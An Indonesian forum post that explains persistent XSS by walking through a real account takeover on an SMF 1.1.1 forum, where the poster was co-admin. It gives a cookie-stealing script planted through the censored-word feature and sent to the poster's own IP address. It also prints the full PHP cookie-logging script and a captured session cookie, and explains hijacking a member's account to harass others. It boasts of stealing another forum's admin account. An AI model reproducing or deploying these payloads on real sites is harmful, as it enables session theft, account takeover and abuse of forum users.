Darkzzzz wrote:@Darkslayer100
Bedanya XSS Persistent sama Html Injection itu apa?
Soale ane pernah baca tentang Html Injection, caranya sama yaitu dengan memasukan Html Code pada Coment Box, Posting, Artikel, dll
Dan XSS Persistent jg begono?
Atau ke-2 nya itu sama?
klo menurut pedapat pribadi saya . Sebenernya HTML dan javascript injection itu g ada. Karena HTML dan javascript injection itu cuman turunan dari XSS (murni pendapat pribadi, CMIIW)
@anharku:
kok gitu sih mas
tapi wajar2 aja kok klo komen begitu, soalnya rata2 kita pengennya cepet dan praktis, seperti LFI,RFI dan SQLi, jumping dll. tapi klo hal-hal tersebut g ada, y mau gmn lagi
seperti saya yang sangat malas jika berhadapan dengan website yg g vulner SQLi v5. Tapi klo udah terlanjur dendam kepada suatu website, y mau gmn lagi :omg:
dan parahnya mentok-mentok XSS cuman di buat deface saja. (Yah.. klo cuman deface/ngerjain temen sih g terlalu berbahaya buat forum). Dan admin g perlu panik akan hal ini. Satu lagi kelemahan XSS adalah kita harus melakukan kegiatan yang bernama MENUNGGU, mungkin kita sudah MALAS duluan dan akhirnya pindah ke web yg lain.
Tapi maksd postingan saya sebelumnya di atas adalah XSS untuk mengambil
account admin bukan cuma untuk deface. Saya dan pihak admin nimbuzzing.org sendiri juga ngeri klo celah ini g di tutup2. Apalagi pihak SMF tidak melakukan patch terhadap celah XSS ini. Mungkin gara2 XSS nya harus mengetahui password dari admin terlebih dahulu karena terletak di dalam halaman admin. Jadi itung2 cuma penghianat forum saja yg bisa melakukan hacking via XSS ini.
mmh.. misalnya begini..
saya kan di percaya untuk menjadi co-admin di situs nimbuzzing.org. Lalu saya di beri kepercayaan untuk dapat mengakses halaman admin. Akan tetapi bukan super admin, melainkan semi-admin biasa saja, sehingga ada banyak hal yg tidak bisa saya lakukan di sana. Misalnya mengganti email/pass super admin atau member2 yg lain. Lalu saya pun memulai sebuah testing untuk mengupgrade hak akses saya. Saya mulai melakukan footprinting pada SMF 1.1.1 di google dan saya menemukan "40 smf vulnerability" yang bisa di baca di
http://code.google.com/p/smf2-review/issues/list
setelah membaca di situ saya tertarik untuk mencoba2 satu persatu. Dan ternyata saya di beri kewenangan untuk menambahkan kata sensor yaitu feature untuk mensensor suatu kata pada SMF. Misalnya: J*anc*k
Exploit nya saya lupa, cz bahasanya nggak jelas banget. Mau baca lagi males :mati:
Lalu setelah menemukan exploit tersebut, saya pun mencoba test XSS. Dan ternyata vulner.
Lalu saya pun lalu menambahkan suatu kata untuk di tambahkan ke dalam cecored word yaitu
xcodeforum dan memasukkan javascript untuk melakukan cookie stealing sebagai kata pengganti xcodeforum. Cara kerjanya adalah jika ada member yang menuliskan kata
xcodeforum maka akan tereplace dengan javascript saya.
Dimana scriptnya adalah:
Code: Select all
<script>document.location="http://114.57.9.164/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.nimbuzzing.org/forum"</script>
Ket: 114.57.9.164 adalah alamat IP saya. Habis nya hostse.com lagi maintanance :mati:
mungkin ini bisa menjawab pertanyaan dari mas darkzzz mengenai "mengapa localhost saya tidak bisa di akses temen2 yg lain dari internet"
Script di atas akan mencatat cookies yang di dapat ke suatu hostingan (dalam hal ini yg di maksd adalah localhost saya) dan akan meredirect nya lagi ke nimbuzzing.org/forum (biar g ketahuan klo di curi)
isi cookiestealer.php adalah:
Code: Select all
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="cookielog.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Setelah itu saya klik OK untuk save settingan ini.
Dalam hal ini username plonk5638 akan mencuri password dari akun member bernama darkslayer (maaf, klo bikin PoC nya nunggu adminnya online ntar bs2 saya baru posting besok, jadi saya pake member yg lain saja untuk pengganti admin) :mati: :mati:
Katakanlah saya dendam dengan darkslayer, sehingga saya ingin agar darkslayer di musuhi oleh semua member / admin, tapi karena saya tidak bisa melihat/mengganti password member, akhirnya saya pakai XSS sebagai jalan keluar.
Di sini saya memodifikasi postingan dari seseorang dalam suatu thread yg kira2 akan dilihat oleh darkslayer (klo kirim messege ntar ketahuan klo saya yg mencuri).
Saya menambahkan kata
xcodeforum di sebuah postingan seorang member.
Selanjutnya adalah menunggu dan menunggu :putusasa: dan kabar terparah nya adalah cookies nya bisa kadaluarsa :omg:
jadi mau g mau saya harus sering2 melihat hostingan saya atau bahkan melakukan ekstensifikasi jebakan.
Tapi pada beberapa website tidak perlu khawatir dengan adanya cookies yg expired. Misalnya pada SMF yang terdapat feature remember me FOREVER (bahkan ketika sudah logout pun, cookies nya masih bisa di pakai) <yg ini saya g tau kenapa>
OK. Ini tampilan postingan nya dengan javascript disabled (krn klo saya enable nanti langsung ke direct ke cookiestealer.php)
Loh..lohh.. kok kata2 xcodeforum nya hilang???
yupz.. karena tadi kita replace xcodeforum dengan javascipt yang tidak terbaca ketika saya mendisable javascript di firefox
Sekarang katakanlah darkslayer lagi jalan2 truz, melihat topik itu dan membukannya, maka darkslayer akan langsung terdirect ke nimbuzzing.org/forum (lihat isi script pertama)
Dan ketika saya (plonk5638) melihat cookielog.txt pada hostingan saya maka akan di dapatkan file berikut:
Code: Select all
IP: 114.57.9.164 | PORT: 3855 | HOST: | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 | METHOD: | REF: http://nimbuzzing.org/forum/pm/ | DATE: Tuesday 27th 2010f July 2010 05:40:41 AM | COOKIE: cookie=SMFCookie463=a%3A4%3A%7Bi%3A0%3Bs%3A4%3A%223502%22%3Bi%3A1%3Bs%3A40%3A%2265910c78b06b85ba14a872998b8e4e37b04b9427%22%3Bi%3A2%3Bi%3A1469396173%3Bi%3A3%3Bi%3A1%3B%7D;%20PHPSESSID=eb88212770e089ef915a4ef8b1e396fb;%20PHPSESSID=eb88212770e089ef915a4ef8b1e396fb;%20base_domain_05968c038291f1985ee5785aa9c6422d=nimbuzzing.org;%20__utma=237767327.77775492.1280175427.1280175427.1280180255.2;%20__utmc=237767327;%20__utmz=237767327.1280180255.2.2.utmcsr=nimbuzzing.org|utmccn=(referral)|utmcmd=referral|utmcct=/forum/pm/;%20_io_ads=22344%2C;%20__utmb=237767327.2.10.1280180255;%20fbsetting_05968c038291f1985ee5785aa9c6422d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Ohya, saya lupa sebelumnya kita juga harus mempelajari bagian mana saja yang di butuhkan. Dalam hal ini, yang penting adalah SMFcookie463 dan PHPSESSID saja yang perlu kita rubah. Setelah mendapatkan cookies ini saya pun mengedit cookie saya (plonk5638) dengan add-ons
add n edit cookies
saya (plonk5638) mengedit bagian SMFCookie463 saya (plonk5638) dengan SMFCookie463 milik darkslayer
Saya (plonk5638) mengedit bagian PHPSESSID saya (plonk5638) dengan PHPSESSID milik darkslayer
Lalu saya klik close pada add n edit cookies dan merefresh browser saya. Finnally saya pun berhasil menguasai account darkslayer dan bersiap-siap untuk melecehkan semua anggota forum, agar semua anggota forum ikut2an dendam pada darkslayer :putusasa:
Sebelum di refresh
setelah di refresh
Untuk mencuri acount admin pun sama seperti proses diatas, cuman berhubung adminnya lagi tidur, y terpaksa dech bikin-bikin account tambahan (hadugh.. g bermutu banget sih PoC gw) :putusasa: :putusasa:
Oleh karena itulah mengapa dalam kategory security, websecurify masih mengkategorykan XSS presistent dalam tingkat High dan non-persistent dalam tingkat medium :maaf:
yah, semoga dengan ini mas anharku dan darkzzz juga memandang XSS sebagai ancaman untuk keamanan web kita :kaca: soalnya saya dulu juga memandang sebelah mata mengenai hal ini, sampai akhirnya saya berhasil mendapatkan account admin forum scient prancis dengan bermodalkan XSS dan sosial engineering dalam waktu seminggu :kaca: :kaca:
darkzzz said: ngomog apaan sih lo . . :gebrak:
anharku said: maklum anak baru biasanya suka berlagak . . :ngakak: :ngakak:
darkslayer: hikz..hikz... :mati: :putusasa:
CMIIW please :maaf: